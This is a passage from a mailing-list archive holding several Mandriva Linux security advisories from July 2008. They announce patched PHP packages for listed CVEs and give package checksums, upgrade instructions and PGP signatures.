2008.0/x86_64/php-sysvmsg-5.2.4-3.2mdv2008.0.x86_64.rpm 899c3c8cf2604a34c95c1f2777f7faca 2008.0/x86_64/php-sysvsem-5.2.4-3.2mdv2008.0.x86_64.rpm 0e9dca07c599f6ab0fe7cd678bfd4056 2008.0/x86_64/php-sysvshm-5.2.4-3.2mdv2008.0.x86_64.rpm 23554f0d3e453e262d8cf06004570db2 2008.0/x86_64/php-tidy-5.2.4-3.2mdv2008.0.x86_64.rpm a9775d8aa17c056b6ecf33493f460af6 2008.0/x86_64/php-tokenizer-5.2.4-3.2mdv2008.0.x86_64.rpm 0de28245d48636781d26186a3f7aa3bf 2008.0/x86_64/php-wddx-5.2.4-3.2mdv2008.0.x86_64.rpm c68b945348738daedffaffc2c7116921 2008.0/x86_64/php-xml-5.2.4-3.2mdv2008.0.x86_64.rpm 11a1d8dfe53bc833def78382853ec2bd 2008.0/x86_64/php-xmlreader-5.2.4-3.2mdv2008.0.x86_64.rpm 8695d6aa557f9947b1c85c9b1f0ff794 2008.0/x86_64/php-xmlrpc-5.2.4-3.2mdv2008.0.x86_64.rpm 30921f94417b1c0a36d91097319ccb69 2008.0/x86_64/php-xmlwriter-5.2.4-3.2mdv2008.0.x86_64.rpm fc8bd211ec721efe34e79b9c37c50be4 2008.0/x86_64/php-xsl-5.2.4-3.2mdv2008.0.x86_64.rpm 20f1b68969555b6d16ee4862f9dbf401 2008.0/x86_64/php-zlib-5.2.4-3.2mdv2008.0.x86_64.rpm 2c717855b2ed804e20c05da11f958e6b 2008.0/SRPMS/php-5.2.4-3.2mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbT1tmqjQ0CJFipgRArQFAKCcqymdDdwSuu+57idL7jxJ9IPiEQCeN8oP oaOP1b+JJp5AsiD6UfECzaY= =7pe0 -----END PGP SIGNATURE----- From security at mandriva.com Fri Jul 4 01:05:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Jul 2008 18:05:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:128 ] - Updated PHP packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:128 http://www.mandriva.com/security/ _______________________________________________________________________ Package : php Date : July 3, 2008 Affected: 2008.1 _______________________________________________________________________ Problem Description: A number of vulnerabilities have been found and corrected in PHP: php-cgi in PHP prior to 5.2.6 does not properly calculate the length of PATH_TRANSLATED, which has unknown impact and attack vectors (CVE-2008-0599). The escapeshellcmd() API function in PHP prior to 5.2.6 has unknown impact and context-dependent attack vectors related to incomplete multibyte characters (CVE-2008-2051). Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5 were discovered that could produce a zero seed in rare circumstances on 32bit systems and generations a portion of zero bits during conversion due to insufficient precision on 64bit systems (CVE-2008-2107, CVE-2008-2108). The IMAP module in PHP uses obsolete API calls that allow context-dependent attackers to cause a denial of service (crash) via a long IMAP request (CVE-2008-2829). In addition, the updated packages provide a number of bug fixes. The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2051 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2829 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: a37818e23e89ac2862f4fb4a64e7a208 2008.1/i586/libphp5_common5-5.2.5-14.1mdv2008.1.i586.rpm c58445867f86bebdd96e22d4acd38060 2008.1/i586/php-bcmath-5.2.5-14.1mdv2008.1.i586.rpm 1ebbc55b496fa354029f3ed79d2204f3 2008.1/i586/php-bz2-5.2.5-14.1mdv2008.1.i586.rpm 94bebca56612a4ec0116f7f5c53da3d0 2008.1/i586/php-calendar-5.2.5-14.1mdv2008.1.i586.rpm 469701782a3d5b629f43605e0a125afa 2008.1/i586/php-cgi-5.2.5-14.1mdv2008.1.i586.rpm 39079d351109e89c80cfa916d6c239d6 2008.1/i586/php-cli-5.2.5-14.1mdv2008.1.i586.rpm 3e71e18a497ac32aa3153cbf801869b9 2008.1/i586/php-ctype-5.2.5-14.1mdv2008.1.i586.rpm 3cf96d78e7c0baaa470df375f756dbe7 2008.1/i586/php-curl-5.2.5-14.1mdv2008.1.i586.rpm 9d5ace343f0edceb34080f6168d2de54 2008.1/i586/php-dba-5.2.5-14.1mdv2008.1.i586.rpm 88a61df3d3e1b08351c3d28d5b1beaa5 2008.1/i586/php-dbase-5.2.5-14.1mdv2008.1.i586.rpm e4be850b54e6e823c323df86ddfb9b65 2008.1/i586/php-devel-5.2.5-14.1mdv2008.1.i586.rpm e08be6d315e4afb0ee8c7abbae1cca30 2008.1/i586/php-dom-5.2.5-14.1mdv2008.1.i586.rpm 94732727478ab8954f987dbb4a7516f3 2008.1/i586/php-exif-5.2.5-14.1mdv2008.1.i586.rpm aac78c46a893ceff0dd2d17f5acd882f 2008.1/i586/php-fcgi-5.2.5-14.1mdv2008.1.i586.rpm 8a75ef9557cdf74be9e39c45bed337a0 2008.1/i586/php-filter-5.2.5-14.1mdv2008.1.i586.rpm ddf3778405e2bca02267d7c4d2678d4a 2008.1/i586/php-ftp-5.2.5-14.1mdv2008.1.i586.rpm e0b1005f29b77a4b210d0470fe83721f 2008.1/i586/php-gd-5.2.5-14.1mdv2008.1.i586.rpm c9dec9d8c87d3880c093d9eac2a7511f 2008.1/i586/php-gettext-5.2.5-14.1mdv2008.1.i586.rpm e990f3a9fbd10fed38e9538fb74dccb1 2008.1/i586/php-gmp-5.2.5-14.1mdv2008.1.i586.rpm e1f22f19e8da5e900989b015ca678cd3 2008.1/i586/php-hash-5.2.5-14.1mdv2008.1.i586.rpm d8c0143f37376b50f56647efebb43252 2008.1/i586/php-iconv-5.2.5-14.1mdv2008.1.i586.rpm 42c7dd288ed5e0cb5fca59bf0f28168f 2008.1/i586/php-imap-5.2.5-14.1mdv2008.1.i586.rpm e826965982e300e1bdb3dd39fe41a72f 2008.1/i586/php-json-5.2.5-14.1mdv2008.1.i586.rpm 8f43b850ee69bab574525bf204296864 2008.1/i586/php-ldap-5.2.5-14.1mdv2008.1.i586.rpm 716cc4fbb174ed8f8df8d1ff2c5227f4 2008.1/i586/php-mbstring-5.2.5-14.1mdv2008.1.i586.rpm c73e47e1c3b5b8bae761bc5705037afd 2008.1/i586/php-mcrypt-5.2.5-14.1mdv2008.1.i586.rpm 74e4c83ddae2b6104993b61092620bda 2008.1/i586/php-mhash-5.2.5-14.1mdv2008.1.i586.rpm 720c20e13ebd9507acefad959a0e02d7 2008.1/i586/php-mime_magic-5.2.5-14.1mdv2008.1.i586.rpm 30c12b2df3ddb506d7ecc430ab4866be 2008.1/i586/php-ming-5.2.5-14.1mdv2008.1.i586.rpm 32fbce35e02d7b65b0cc2cdbc6d08586 2008.1/i586/php-mssql-5.2.5-14.1mdv2008.1.i586.rpm 9cf62b9e2ddd9336e6f524a6d90780e7 2008.1/i586/php-mysql-5.2.5-14.1mdv2008.1.i586.rpm e522238c50ebcbc6ca91f358be4e1c2e 2008.1/i586/php-mysqli-5.2.5-14.1mdv2008.1.i586.rpm 1dd4dad359a05f08196abf13221abf20 2008.1/i586/php-ncurses-5.2.5-14.1mdv2008.1.i586.rpm 7db383a489801c8353894e4b9f7e6512 2008.1/i586/php-odbc-5.2.5-14.1mdv2008.1.i586.rpm 5f63c09754e30903b4876f2c2a822f6a 2008.1/i586/php-openssl-5.2.5-14.1mdv2008.1.i586.rpm 4e96480d6769fac868af9566c091b3fc 2008.1/i586/php-pcntl-5.2.5-14.1mdv2008.1.i586.rpm 0718aa1bffe5e7c91b10f70c7eec68f3 2008.1/i586/php-pdo-5.2.5-14.1mdv2008.1.i586.rpm 7c0b4674ec56c2a6fe87c7b224e1ccab 2008.1/i586/php-pdo_dblib-5.2.5-14.1mdv2008.1.i586.rpm 7e3881d1059fb8c1b5986b1852f97696 2008.1/i586/php-pdo_mysql-5.2.5-14.1mdv2008.1.i586.rpm 0f3d7ede7adf2cae8d0a2735ada5fbc4 2008.1/i586/php-pdo_odbc-5.2.5-14.1mdv2008.1.i586.rpm b9dbde00f72ae70b8328441ce041bcac 2008.1/i586/php-pdo_pgsql-5.2.5-14.1mdv2008.1.i586.rpm bebde3a51ea7599d4cab973b0d21caed 2008.1/i586/php-pdo_sqlite-5.2.5-14.1mdv2008.1.i586.rpm fd9f335c54865f610bb3d5d708fef9bb 2008.1/i586/php-pgsql-5.2.5-14.1mdv2008.1.i586.rpm 5466493db048f4bed3dc5e3d8b13aed2 2008.1/i586/php-posix-5.2.5-14.1mdv2008.1.i586.rpm 127092f9644567139b8205269215adbb 2008.1/i586/php-pspell-5.2.5-14.1mdv2008.1.i586.rpm 1d121691eaa30b2dc6a6704b39d03ce1 2008.1/i586/php-readline-5.2.5-14.1mdv2008.1.i586.rpm f9980c14e99ed971263dbe0b4c92ce71 2008.1/i586/php-recode-5.2.5-14.1mdv2008.1.i586.rpm c0307d2020f00104e0c4d4043f5e5437 2008.1/i586/php-session-5.2.5-14.1mdv2008.1.i586.rpm eada076c0ee76e265288c4ebbb255635 2008.1/i586/php-shmop-5.2.5-14.1mdv2008.1.i586.rpm 83ccb133b2599af455f477320035c561 2008.1/i586/php-snmp-5.2.5-14.1mdv2008.1.i586.rpm e7bb2545d59e14f092557451dfcc160a 2008.1/i586/php-soap-5.2.5-14.1mdv2008.1.i586.rpm f2d2d080d7c96c1fc7c8f9b6c33e99b0 2008.1/i586/php-sockets-5.2.5-14.1mdv2008.1.i586.rpm bbebe55b2bceb651c326259534a0468d 2008.1/i586/php-sqlite-5.2.5-14.1mdv2008.1.i586.rpm 3abc11b2e11b6357320e7f7e64369924 2008.1/i586/php-sysvmsg-5.2.5-14.1mdv2008.1.i586.rpm 5d7fda3b32ac01f36959b567921f7cf2 2008.1/i586/php-sysvsem-5.2.5-14.1mdv2008.1.i586.rpm fa966a7d383c29cee238ce0537226c0c 2008.1/i586/php-sysvshm-5.2.5-14.1mdv2008.1.i586.rpm 60844677bf0322abd1c7beef732bf33b 2008.1/i586/php-tidy-5.2.5-14.1mdv2008.1.i586.rpm 8c3bce1a573136ab356d1640f1be9fa3 2008.1/i586/php-tokenizer-5.2.5-14.1mdv2008.1.i586.rpm 74576d184434f0bd36821b5f3963f533 2008.1/i586/php-wddx-5.2.5-14.1mdv2008.1.i586.rpm 058bfe6e2ba389dae88e3dbdc19fda00 2008.1/i586/php-xml-5.2.5-14.1mdv2008.1.i586.rpm 8ebd48b983d0a5e68bc6ef81b6698964 2008.1/i586/php-xmlreader-5.2.5-14.1mdv2008.1.i586.rpm 908064c9dc1ddd6337d5ff4d619fb6c4 2008.1/i586/php-xmlrpc-5.2.5-14.1mdv2008.1.i586.rpm a01f3cf2339e062cec8652898791e800 2008.1/i586/php-xmlwriter-5.2.5-14.1mdv2008.1.i586.rpm ca7d59d3a9eec66673b71bd56aea8dfe 2008.1/i586/php-xsl-5.2.5-14.1mdv2008.1.i586.rpm 6616f95893cd6fce078149160fe4399e 2008.1/i586/php-zlib-5.2.5-14.1mdv2008.1.i586.rpm c682f37976c4704d2cfeaa7cd431178b 2008.1/SRPMS/php-5.2.5-14.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 37c9c71baaf2a3d871d2fb03adec4cf0 2008.1/x86_64/lib64php5_common5-5.2.5-14.1mdv2008.1.x86_64.rpm 7d231c361203d4b5d0408125cf1f8649 2008.1/x86_64/php-bcmath-5.2.5-14.1mdv2008.1.x86_64.rpm 47a0fe202badead8966c79f853f8dc89 2008.1/x86_64/php-bz2-5.2.5-14.1mdv2008.1.x86_64.rpm e31174f0b54331b56db910c4fb2c79a5 2008.1/x86_64/php-calendar-5.2.5-14.1mdv2008.1.x86_64.rpm 3853e043253e63cad86fb2dd947091d8 2008.1/x86_64/php-cgi-5.2.5-14.1mdv2008.1.x86_64.rpm 1d290d98029652e2d5c2492859581162 2008.1/x86_64/php-cli-5.2.5-14.1mdv2008.1.x86_64.rpm 6506809c7d37f485d99f8fc21eeed0a8 2008.1/x86_64/php-ctype-5.2.5-14.1mdv2008.1.x86_64.rpm 7b091eebb11aaacf07d4939ff512c88b 2008.1/x86_64/php-curl-5.2.5-14.1mdv2008.1.x86_64.rpm 7bb1bcda1b3a2d54477d04f27bd1f333 2008.1/x86_64/php-dba-5.2.5-14.1mdv2008.1.x86_64.rpm bc0b1006a1743e88e49256b964997e57 2008.1/x86_64/php-dbase-5.2.5-14.1mdv2008.1.x86_64.rpm 5912b191d3faff077ac26d7820dcc8c0 2008.1/x86_64/php-devel-5.2.5-14.1mdv2008.1.x86_64.rpm 31fece421e022bc04abe1357c1d4f7e2 2008.1/x86_64/php-dom-5.2.5-14.1mdv2008.1.x86_64.rpm f8a4115d99dc3015861726179cfc866e 2008.1/x86_64/php-exif-5.2.5-14.1mdv2008.1.x86_64.rpm fd6d2f5101133ef83fcece1d07b8af64 2008.1/x86_64/php-fcgi-5.2.5-14.1mdv2008.1.x86_64.rpm 3f74157d45ffa63d859882bbffcbe919 2008.1/x86_64/php-filter-5.2.5-14.1mdv2008.1.x86_64.rpm 2a732c2d7a96f3a1121dd12a7efd9daf 2008.1/x86_64/php-ftp-5.2.5-14.1mdv2008.1.x86_64.rpm b93cf200e2ae6e01d492fdc94ea07482 2008.1/x86_64/php-gd-5.2.5-14.1mdv2008.1.x86_64.rpm 18cd2997f1f00662691a181dc43a8ec1 2008.1/x86_64/php-gettext-5.2.5-14.1mdv2008.1.x86_64.rpm 4dafaf30e6d723648f1bd7030dc1a8e6 2008.1/x86_64/php-gmp-5.2.5-14.1mdv2008.1.x86_64.rpm edd1290a6aaa8a017c1831ad11130e27 2008.1/x86_64/php-hash-5.2.5-14.1mdv2008.1.x86_64.rpm 853ea355568c412d690ac7ddde72546d 2008.1/x86_64/php-iconv-5.2.5-14.1mdv2008.1.x86_64.rpm ad0cf57cfc042eb64d112ad59a40c421 2008.1/x86_64/php-imap-5.2.5-14.1mdv2008.1.x86_64.rpm f4a0b0017d988de9929d89b086b349ef 2008.1/x86_64/php-json-5.2.5-14.1mdv2008.1.x86_64.rpm b27cd3253b5c00ebd67745ad13243c84 2008.1/x86_64/php-ldap-5.2.5-14.1mdv2008.1.x86_64.rpm 676b808a0b587a4257f88d11036e3aa0 2008.1/x86_64/php-mbstring-5.2.5-14.1mdv2008.1.x86_64.rpm fe20ac6413273ac7fa4485256e60995a 2008.1/x86_64/php-mcrypt-5.2.5-14.1mdv2008.1.x86_64.rpm dcf40cacec48726612f8411ba34ed8f4 2008.1/x86_64/php-mhash-5.2.5-14.1mdv2008.1.x86_64.rpm b3fb128a1a3a1561bc862c2796b95298 2008.1/x86_64/php-mime_magic-5.2.5-14.1mdv2008.1.x86_64.rpm 7f1e71f77fe2106f0242e783d5257b52 2008.1/x86_64/php-ming-5.2.5-14.1mdv2008.1.x86_64.rpm e56f6b325bddbfb3c4a8fcbbbf3d95e1 2008.1/x86_64/php-mssql-5.2.5-14.1mdv2008.1.x86_64.rpm 499affb25800bab89d30e72be7b887d4 2008.1/x86_64/php-mysql-5.2.5-14.1mdv2008.1.x86_64.rpm a7b61b06508a6d220380a3de3a3ee545 2008.1/x86_64/php-mysqli-5.2.5-14.1mdv2008.1.x86_64.rpm 555ac0b707dc050b2557559474e45e92 2008.1/x86_64/php-ncurses-5.2.5-14.1mdv2008.1.x86_64.rpm dfd63fe4e7e853d1ca298d3d0f273847 2008.1/x86_64/php-odbc-5.2.5-14.1mdv2008.1.x86_64.rpm 4682fe6bb3a0b060e88af72754def31b 2008.1/x86_64/php-openssl-5.2.5-14.1mdv2008.1.x86_64.rpm 87559329a3c48b52ead4d0565c8b245c 2008.1/x86_64/php-pcntl-5.2.5-14.1mdv2008.1.x86_64.rpm 9d5c6b3e1c7cf51ecdc18f591d2db51d 2008.1/x86_64/php-pdo-5.2.5-14.1mdv2008.1.x86_64.rpm d65c65b59daf765bb59102b6c7efaa8f 2008.1/x86_64/php-pdo_dblib-5.2.5-14.1mdv2008.1.x86_64.rpm 710d8e5738610884f6a05d92216f4f92 2008.1/x86_64/php-pdo_mysql-5.2.5-14.1mdv2008.1.x86_64.rpm 1041b835da177f8a23c57fc27b1b950d 2008.1/x86_64/php-pdo_odbc-5.2.5-14.1mdv2008.1.x86_64.rpm 233b492c194e5c2ea8a57e97c5957280 2008.1/x86_64/php-pdo_pgsql-5.2.5-14.1mdv2008.1.x86_64.rpm 1dc281eff1f624d93202a664ff415a24 2008.1/x86_64/php-pdo_sqlite-5.2.5-14.1mdv2008.1.x86_64.rpm 496c4cd0662b01c72ef1d88125a32c28 2008.1/x86_64/php-pgsql-5.2.5-14.1mdv2008.1.x86_64.rpm 547460ae2e62432fb8469ad6d57927f3 2008.1/x86_64/php-posix-5.2.5-14.1mdv2008.1.x86_64.rpm 0e4270d3c85e1b08cf28989d5ccc99d7 2008.1/x86_64/php-pspell-5.2.5-14.1mdv2008.1.x86_64.rpm 0f3d47e68701ffcb9a0161efcc9e8423 2008.1/x86_64/php-readline-5.2.5-14.1mdv2008.1.x86_64.rpm c8b466772de1a950054aaad758f1512d 2008.1/x86_64/php-recode-5.2.5-14.1mdv2008.1.x86_64.rpm 5de0ce9556bbba884cb77b472a4fce45 2008.1/x86_64/php-session-5.2.5-14.1mdv2008.1.x86_64.rpm 98bcdd66540cf1f4c900b99ae75f2d4c 2008.1/x86_64/php-shmop-5.2.5-14.1mdv2008.1.x86_64.rpm d281db526e9ae8f8032bf5982a54ba28 2008.1/x86_64/php-snmp-5.2.5-14.1mdv2008.1.x86_64.rpm def9b2719027320b6e03789f05d673f0 2008.1/x86_64/php-soap-5.2.5-14.1mdv2008.1.x86_64.rpm 7590250ef2892572cbe6713554e8f4b8 2008.1/x86_64/php-sockets-5.2.5-14.1mdv2008.1.x86_64.rpm 490f258c279227ef5fea6ab8abc19197 2008.1/x86_64/php-sqlite-5.2.5-14.1mdv2008.1.x86_64.rpm 2111518b9739bb23069cf98914b9065d 2008.1/x86_64/php-sysvmsg-5.2.5-14.1mdv2008.1.x86_64.rpm 0bda452b910ab8c98ba9fd35cc8f2ac5 2008.1/x86_64/php-sysvsem-5.2.5-14.1mdv2008.1.x86_64.rpm 8d75772a16f8582c55a4cf44ad28d50c 2008.1/x86_64/php-sysvshm-5.2.5-14.1mdv2008.1.x86_64.rpm f6237eba6d016b4c37da619be5411817 2008.1/x86_64/php-tidy-5.2.5-14.1mdv2008.1.x86_64.rpm 2f4ed9b3fe6521c8ba7b18339c651666 2008.1/x86_64/php-tokenizer-5.2.5-14.1mdv2008.1.x86_64.rpm da555a1459c356f1d0ac3d02f33d977a 2008.1/x86_64/php-wddx-5.2.5-14.1mdv2008.1.x86_64.rpm c9705d61d3c0ce345a5e7454c76eab6c 2008.1/x86_64/php-xml-5.2.5-14.1mdv2008.1.x86_64.rpm 5e7ab83900d27a1e250e124640ce5821 2008.1/x86_64/php-xmlreader-5.2.5-14.1mdv2008.1.x86_64.rpm 3582889fd9e5830a7d6bf703510382f4 2008.1/x86_64/php-xmlrpc-5.2.5-14.1mdv2008.1.x86_64.rpm 85b704914f5ebb3f25c010e82297dc32 2008.1/x86_64/php-xmlwriter-5.2.5-14.1mdv2008.1.x86_64.rpm fbfd8f6863d70fee3781d07a72e33152 2008.1/x86_64/php-xsl-5.2.5-14.1mdv2008.1.x86_64.rpm bc8f8000a2d6a9815a153ddeda04dd1d 2008.1/x86_64/php-zlib-5.2.5-14.1mdv2008.1.x86_64.rpm c682f37976c4704d2cfeaa7cd431178b 2008.1/SRPMS/php-5.2.5-14.1mdv2008.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbT7gmqjQ0CJFipgRAqVOAKC/PGY3i2IKO592B0Ukfck2HnZPogCfUijv tvsSl4XAuy3Fg1iJ05MfgMs= =M3vw -----END PGP SIGNATURE----- From security at mandriva.com Fri Jul 4 00:51:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Jul 2008 17:51:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:125 ] - Updated PHP packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:125 http://www.mandriva.com/security/ _______________________________________________________________________ Package : php Date : July 3, 2008 Affected: Corporate 4.0 _______________________________________________________________________ Problem Description: A number of vulnerabilities have been found and corrected in PHP: A vulnerability in the chunk_split() function in PHP prior to 5.2.4 has unknown impact and attack vectors, related to an incorrect size calculation (CVE-2007-4660). The htmlentities() and htmlspecialchars() functions in PHP prior to 5.2.5 accepted partial multibyte sequences, which has unknown impact and attack vectors (CVE-2007-5898). The output_add_rewrite_var() function in PHP prior to 5.2.5 rewrites local forms in which the ACTION attribute references a non-local URL, which could allow a remote attacker to obtain potentially sensitive information by reading the requests for this URL (CVE-2007-5899). The escapeshellcmd() API function in PHP prior to 5.2.6 has unknown impact and context-dependent attack vectors related to incomplete multibyte characters (CVE-2008-2051). Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5 were discovered that could produce a zero seed in rare circumstances on 32bit systems and generations a portion of zero bits during conversion due to insufficient precision on 64bit systems (CVE-2008-2107, CVE-2008-2108). The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4660 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2051 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 _______________________________________________________________________ Updated Packages: Corporate 4.0: caaccf7c09c6aaf4776e9e0e5ed5bece corporate/4.0/i586/libphp5_common5-5.1.6-1.9.20060mlcs4.i586.rpm 9a8188e1394c8d11879267e3d00f5b51 corporate/4.0/i586/php-cgi-5.1.6-1.9.20060mlcs4.i586.rpm a37e970a7e29295bd30db80d4e47b22a corporate/4.0/i586/php-cli-5.1.6-1.9.20060mlcs4.i586.rpm fd2fc49926605a03ff2012fae8bfe4fc corporate/4.0/i586/php-devel-5.1.6-1.9.20060mlcs4.i586.rpm c7ff04be0c2efc6a83f4c7741d7b17cc corporate/4.0/i586/php-fcgi-5.1.6-1.9.20060mlcs4.i586.rpm 89a3ae3cc996094efa76c4e8ad742fad corporate/4.0/SRPMS/php-5.1.6-1.9.20060mlcs4.src.rpm Corporate 4.0/X86_64: 31682b09f5d4b11116b4178c1257dc46 corporate/4.0/x86_64/lib64php5_common5-5.1.6-1.9.20060mlcs4.x86_64.rpm 980828b8789ebe420a49a6e017f9c862 corporate/4.0/x86_64/php-cgi-5.1.6-1.9.20060mlcs4.x86_64.rpm 95b5fa22905c223987f3c0bdeb28d3fe corporate/4.0/x86_64/php-cli-5.1.6-1.9.20060mlcs4.x86_64.rpm 985ed4da464a4f8ba96e8b086a95d5a3 corporate/4.0/x86_64/php-devel-5.1.6-1.9.20060mlcs4.x86_64.rpm 56eed2db968237420c59f5a5ec3b7554 corporate/4.0/x86_64/php-fcgi-5.1.6-1.9.20060mlcs4.x86_64.rpm 89a3ae3cc996094efa76c4e8ad742fad corporate/4.0/SRPMS/php-5.1.6-1.9.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbTtTmqjQ0CJFipgRAnNAAKDwwaKKcTBqPYE40XfKDbRrAvoiOwCgqEAn Zhoapnb5zx3YIXdkfv2y5eA= =zV17 -----END PGP SIGNATURE----- From security at mandriva.com Fri Jul 4 00:55:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Jul 2008 17:55:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:126 ] - Updated PHP packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:126 http://www.mandriva.com/security/ _______________________________________________________________________ Package : php Date : July 3, 2008 Affected: 2007.1 _______________________________________________________________________ Problem Description: A number of vulnerabilities have been found and corrected in PHP: PHP 5.2.1 would allow context-dependent attackers to read portions of heap memory by executing certain scripts with a serialized data input string beginning with 'S:', which did not properly track the number of input bytes being processed (CVE-2007-1649). A vulnerability in the chunk_split() function in PHP prior to 5.2.4 has unknown impact and attack vectors, related to an incorrect size calculation (CVE-2007-4660). The htmlentities() and htmlspecialchars() functions in PHP prior to 5.2.5 accepted partial multibyte sequences, which has unknown impact and attack vectors (CVE-2007-5898). The output_add_rewrite_var() function in PHP prior to 5.2.5 rewrites local forms in which the ACTION attribute references a non-local URL, which could allow a remote attacker to obtain potentially sensitive information by reading the requests for this URL (CVE-2007-5899). The escapeshellcmd() API function in PHP prior to 5.2.6 has unknown impact and context-dependent attack vectors related to incomplete multibyte characters (CVE-2008-2051). Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5 were discovered that could produce a zero seed in rare circumstances on 32bit systems and generations a portion of zero bits during conversion due to insufficient precision on 64bit systems (CVE-2008-2107, CVE-2008-2108). The IMAP module in PHP uses obsolete API calls that allow context-dependent attackers to cause a denial of service (crash) via a long IMAP request (CVE-2008-2829). The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1649 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4660 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2051 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2829 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: a316408737eaf14cb5728521e26dc446 2007.1/i586/libphp5_common5-5.2.1-4.4mdv2007.1.i586.rpm 269a3fc71e4e6a17b430d30e74823dca 2007.1/i586/php-cgi-5.2.1-4.4mdv2007.1.i586.rpm d840c24a91806daab679185222766687 2007.1/i586/php-cli-5.2.1-4.4mdv2007.1.i586.rpm d034af9be26232c573cca06db1692a42 2007.1/i586/php-devel-5.2.1-4.4mdv2007.1.i586.rpm 85c65924946fa451bd74f6f51dbfcae8 2007.1/i586/php-fcgi-5.2.1-4.4mdv2007.1.i586.rpm d6489ed1c6d4e7a35793dd5a5fe4dabd 2007.1/i586/php-imap-5.2.1-1.1mdv2007.1.i586.rpm 1e478e16e65af0176da924ed73dea263 2007.1/i586/php-openssl-5.2.1-4.4mdv2007.1.i586.rpm 4a84f4f8b64881333e706554bb26c8a2 2007.1/i586/php-zlib-5.2.1-4.4mdv2007.1.i586.rpm 48bdf497322e9b5286a74374d0e1b460 2007.1/SRPMS/php-5.2.1-4.4mdv2007.1.src.rpm 259d657e68e17b093fa76d29b5e5499d 2007.1/SRPMS/php-imap-5.2.1-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: e1c817b7c6b806131a4311493fe45707 2007.1/x86_64/lib64php5_common5-5.2.1-4.4mdv2007.1.x86_64.rpm 226211fdeb224123af811eb4468362e3 2007.1/x86_64/php-cgi-5.2.1-4.4mdv2007.1.x86_64.rpm 14e05c3865244c7e9f352bac59268ca3 2007.1/x86_64/php-cli-5.2.1-4.4mdv2007.1.x86_64.rpm 7e8f6a34863eb897cc6391909ff893ce 2007.1/x86_64/php-devel-5.2.1-4.4mdv2007.1.x86_64.rpm 8f434207ce93f4e4a20d85b45aaa4093 